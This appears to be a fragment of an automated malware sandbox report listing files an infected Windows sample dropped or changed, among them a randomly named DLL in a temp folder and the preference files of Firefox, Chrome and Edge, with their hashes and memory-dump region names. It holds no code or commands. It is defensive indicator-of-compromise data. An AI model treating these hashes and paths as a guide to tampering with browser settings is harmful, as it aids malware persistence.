SHA512 46a509ab53f107940b3699b5a0757ff07b3410f0be08d78e9ee9d08c0f898461ab1f309aa12f36d80aaa529ade72a419695ebafaedfd4ce5de329ccb53e55ee8

C:\Program Files (x86)\mVqQIGUXDOgrC\bUSpFiY.xml

MD5 79998d886c9a72ca2fa9619c500616fd
SHA1 cfb755219ddbed1f90a2a1d65cdfad4822eba4ef
SHA256 6c41823d257a119181cf910c4fde0b713c0a21caf271267344b25fe84c2cce4f
SHA512 276a4d3435eb3f05da7c5fc6600a5c62c9b2e51abd1d4e9d6e3520b3b8182f79ad8787a7f864631e7b17cf2f775a5808246358229d7e1590add677013bea0e86

C:\Windows\Temp\IzRZTwSZebgYVSAl\PgHWHVfe\wCBsdaR.dll

MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

memory/4764-487-0x0000000003DB0000-0x0000000003E3A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs.js

MD5 92eb93d1622cb7de7f1cfc37fa9238e9
SHA1 032b40be617a3acabbcfdc9428c845e50a14aa91
SHA256 3d7cc9bb482d64432b34a89ea1aa6cbf576032a460c21c2bec77562c8dcc8900
SHA512 3b2b8a344080892d4b7080ccce9b1fc3d387f97e6c5c0075c7fe9962f35c669d19ad02ca83648dfd69452bd4c3e982f05ce0f799eb062574063e34830a491954

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 754673399fcb1be9008e06588f7d7fd1
SHA1 8c67118fd233eb980f63dd62a489a0ac91a5e054
SHA256 3aed9255e7ae04b7b08e07cde4a58b58f842543fc7e914a9a924435a002e8e3c
SHA512 20cbd5b75cf36c6ba911fc4f75aabe118207cf7466e6e68f7f181cf6699f7e3ef18f3fb290ee7cc66b43ea7c22839468067873f8413bfd9efed193518e3242c8

memory/4628-497-0x0000000001C40000-0x0000000002228000-memory.dmp

memory/4764-505-0x0000000003E40000-0x0000000003F15000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a6e46a4513e8426f6e0eb2894ca33a7b
SHA1 fabd922470628d64d90006a6c458951c536c8ba1
SHA256 d480a7b19f51d2401d6342c7adf11ce34fd6a1fc86189bd8210f630ee2182d42
SHA512 69a4213bafb4829566188b0c05d2168ee96f72b6d4db53d7ce4bcff611dfbb6ad1adc5ff62dd9c9cddbbeaea575fef11f15768918adb14aaf5fbe188176e2a1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7ce2374fa786922c8599ac132b0b483e
SHA1 388fe879faf8eebb979737528cd702ca3c8ac2d5
SHA256 d65d684d2d63811939c30ce851f4a2fea3f6188f7e1da9f0271b8bd6b4d8d616
SHA512 099822c4dce84e348cb7268808259b1e0462d02cfbe14549223e242ec6864fc224aa2f77bb64f95e2a0d506a30d0364268cd182c3ffa4cdb81630af529dee35e